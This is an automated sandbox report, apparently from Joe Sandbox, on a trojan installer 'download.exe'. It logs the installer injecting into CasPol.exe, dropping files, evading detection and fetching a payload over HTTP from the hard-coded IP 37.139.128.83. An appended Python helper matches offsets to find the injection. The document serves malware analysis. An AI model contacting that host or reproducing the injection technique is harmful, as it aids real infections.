          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 20 Mar 2023 12:24:22 GMT | Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 | Vary: accept-language,accept-charset | Accept-Ranges: bytes | Transfer-Encoding: chunked | Content-Type: text/html; charset=utf-8 | Content-Language: en | Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e | Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: unknown | TCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2$2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2-2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/262hk
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2Data
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2M
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2R2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2W7
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2e
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2gsLMEM8
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/2k
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://37.139.128.83/l
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: download.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: download.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0N
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0O
          Source: download.exe | String found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: download.exe | String found in binary or memory: http://s.symcd.com06
          Source: download.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: download.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: download.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://www.avast.com0/
          Source: lang-1032.dll.2.dr | String found in binary or memory: http://www.digicert.com/CPS0
          Source: download.exe | String found in binary or memory: https://d.symcb.com/cps0%
          Source: download.exe | String found in binary or memory: https://d.symcb.com/rpa0
          Source: download.exe | String found in binary or memory: https://d.symcb.com/rpa0.
          Source: lang-1032.dll.2.dr | String found in binary or memory: https://www.digicert.com/CPS0
          Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 37.139.128.83 | Cache-Control: no-cache
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004051E2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: download.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\download.exe | File created: C:\Windows\resources\0409
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_00404A21
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_706B1A98
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A314A8
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A320AE
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32897
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3189B
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A310F6
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A324DB
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32C37
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3143B
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31800
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32018
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31C75
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32441
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32DA2
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31D82
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3198B
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3318B
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3218A
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A321E8
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A319F6
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A315D0
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32D30
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3153A
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32909
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31D0C
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3191C
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3211C
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3296F
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3116E
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32552
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31AA9
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A316B3
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A30E92
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32E97
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3269B
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A30E9A
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A326FB
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A312DA
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32A20
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3162C
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3123F
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32A08
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32E1D
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3261D
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32260
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31E6F
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A30E44
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31A4D
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A323B2
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3178C
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32B94
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31BE1
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32FDA
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31336
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32F3F
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3233C
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A32B01
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31B0F
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31718
          Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A31B71
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31F75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631C75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632441
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632C37
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063143B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631800
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632018
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006310F6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006324DB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006314A8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006320AE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632897
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063189B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063296F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063116E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632552
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632D30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063153A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632909
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631D0C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063191C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063211C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006321E8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006319F6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006315D0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632DA2
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631D82
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063198B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063318B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063218A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632260
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631E6F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E44
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631A4D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632A20
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063162C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063123F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632A08
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632E1D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063261D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006326FB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006312DA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631AA9
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006316B3
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E92
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632E97
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063269B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E9A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631B71
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631F75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631336
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632F3F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063233C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632B01
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631B0F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631718
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631BE1
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632FDA
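The two lists above are the same function set at two bases, which is the injection evidence a reviewer actually wants from this report. The following script is an added example and not part of the Joe Sandbox report: it parses "Code function" lines, groups addresses by 64 KiB region (the VirtualAlloc allocation granularity, an assumption about how the region was allocated), reports region pairs in different processes whose function offsets overlap, and checks the candidate against the recorded memory write to CasPol.exe at base 0x630000. The input is a constructed subset of the entries above, plus the NSIS entry point of download.exe as a control that must not match.

```python
import re
from collections import defaultdict

# Constructed subset of the "Code function" entries from this report (not the
# full list). 2_2_ entries were recorded in download.exe (PID 8540), 4_2_
# entries in CasPol.exe (PID 924). The 2_2_004031E9 line is the NSIS entry
# point of the on-disk download.exe image, included as a non-matching control.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A32018
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A31C75
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A32441
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A32DA2
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A31D82
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A3198B
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A3318B
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A3218A
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A321E8
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A319F6
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A315D0
Source: C:\Users\user\Desktop\download.exe Code function: 2_2_04A32D30
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_00631C75
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_00632441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_00632C37
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_0063143B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_00631800
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_00632018
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_006310F6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_00632DA2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_00631D82
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_0063198B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_0063318B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_0063218A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_006321E8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_006319F6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_006315D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_00632D30
"""

# Recorded in this report under HIPS / PFW / Operating System Protection
# Evasion: download.exe wrote into CasPol.exe at this base address.
MEMORY_WRITE_TARGET_BASE = 0x630000

# Assumption: the injected region was allocated with VirtualAlloc(Ex), whose
# allocation granularity is 64 KiB, so masking the low 16 bits recovers a base.
REGION_MASK = 0xFFFF

FUNC_RE = re.compile(r"Code function: (\d+)_\d+_([0-9A-Fa-f]{8})")


def regions(text):
    """Group function addresses by (analysis index, 64 KiB region base).

    Returns {(index, base): frozenset(offsets within that region)}.
    """
    out = defaultdict(set)
    for m in FUNC_RE.finditer(text):
        idx, addr = int(m.group(1)), int(m.group(2), 16)
        out[(idx, addr & ~REGION_MASK)].add(addr & REGION_MASK)
    return {key: frozenset(offs) for key, offs in out.items()}


def injection_candidates(text, min_jaccard=0.5):
    """Find region pairs in different processes whose function offsets overlap.

    Identical offsets at different bases are what one copied (injected) code
    blob looks like once each process holds its own allocation of it. The
    src/dst labels only follow sort order; direction comes from corroborated().
    """
    regs = regions(text)
    keys = sorted(regs)
    hits = []
    for i, a in enumerate(keys):
        for b in keys[i + 1:]:
            if a[0] == b[0]:
                continue  # same process: not a cross-process copy
            shared = regs[a] & regs[b]
            jaccard = len(shared) / len(regs[a] | regs[b])
            if jaccard >= min_jaccard:
                hits.append({"src_index": a[0], "src_base": a[1],
                             "dst_index": b[0], "dst_base": b[1],
                             "shared": shared, "jaccard": jaccard})
    return sorted(hits, key=lambda h: -h["jaccard"])


def corroborated(hits, written_base=MEMORY_WRITE_TARGET_BASE):
    """Keep only candidates whose destination base matches a recorded memory write."""
    return [h for h in hits if h["dst_base"] == written_base]


if __name__ == "__main__":
    for h in corroborated(injection_candidates(REPORT_LINES)):
        print(f"process {h['src_index']} @ {h['src_base']:#010x} -> "
              f"process {h['dst_index']} @ {h['dst_base']:#010x}: "
              f"{len(h['shared'])} shared offsets, jaccard={h['jaccard']:.2f}")
```

Run it over a full report export the same way; a pair with high overlap whose destination base coincides with a "Memory written" event is the injected region, and the offsets in `shared` are the first places to disassemble in either memory dump.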
Source: lang-1032.dll.2.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: lang-1032.dll.2.dr | Static PE information: No import functions for PE file found
Source: C:\Users\user\Desktop\download.exe | Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Section loaded: edgegdi.dll
Source: download.exe | Static PE information: invalid certificate
Source: C:\Users\user\Desktop\download.exe | File read: C:\Users\user\Desktop\download.exe
Source: download.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\download.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\download.exe, command line: C:\Users\user\Desktop\download.exe
Source: C:\Users\user\Desktop\download.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, command line: C:\Users\user\Desktop\download.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process created: C:\Windows\System32\conhost.exe, command line: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\download.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, command line: C:\Users\user\Desktop\download.exe
Source: C:\Users\user\Desktop\download.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\download.exe | File created: C:\Users\user\AppData\Local\Temp\nsp21EF.tmp
Source: classification engine | Classification label: mal76.troj.evad.winEXE@4/5@0/1
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\download.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004044AE GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:304:WilStaging_02
Source: download.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

Source: Yara match | File source: 00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: download.exe PID: 8540, type: MEMORYSTR
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_706B2F20 push eax; ret
Source: C:\Users\user\Desktop\download.exe | Code functions with push es; retf: 2_2_04A314A8, 2_2_04A320AE, 2_2_04A32897, 2_2_04A3189B, 2_2_04A30C99, 2_2_04A3449E, 2_2_04A3349D, 2_2_04A340E2, 2_2_04A340E6, 2_2_04A310F6, 2_2_04A30CFC, 2_2_04A33CCE, 2_2_04A324DB, 2_2_04A32C37, 2_2_04A3143B, 2_2_04A33C02, 2_2_04A31800, 2_2_04A3440B, 2_2_04A3341B, 2_2_04A32018, 2_2_04A34076, 2_2_04A31C75, 2_2_04A33878, 2_2_04A32441, 2_2_04A335A3
Source: C:\Users\user\Desktop\download.exe | Code functions with push esp; ret: 2_2_04A388BE, 2_2_04A394EB
Source: C:\Users\user\Desktop\download.exe | Code functions with pushfd; ret: 2_2_04A364DC, 2_2_04A36C50
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_04A3641D push 7E114A25h; iretd
Note: push es; retf is the two-byte sequence 06 CB, and it is reported here at the same offsets that the code-function enumeration above treated as function starts (0x2018, 0x1C75, 0x2441 and others). That pattern is what a linear sweep over encrypted or otherwise non-code bytes produces, so this signature is weak evidence by itself; the memory regions it points at matter because they are the ones copied into CasPol.exe, not because of the instructions it found in them.
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_706B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
Source: C:\Users\user\Desktop\download.exe | File created: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll
Source: C:\Users\user\Desktop\download.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll
Source: C:\Users\user\Desktop\download.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
